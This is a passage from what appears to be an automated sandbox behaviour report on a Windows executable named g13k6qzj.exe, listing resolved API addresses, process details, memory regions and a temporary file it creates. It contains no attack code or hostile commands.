| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-12 16:14:24 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #48: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #48 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:07, Reason: Child Process |
| Unmonitor | End Time: 00:02:13, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe74 |
| Parent PID | 0xa28 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AEC
0x
E54
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002e0000 | 0x0039dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0062ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000630000 | 0x00630000 | 0x007b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x00940fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000950000 | 0x00950000 | 0x01d4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74680000 | 0x74711fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
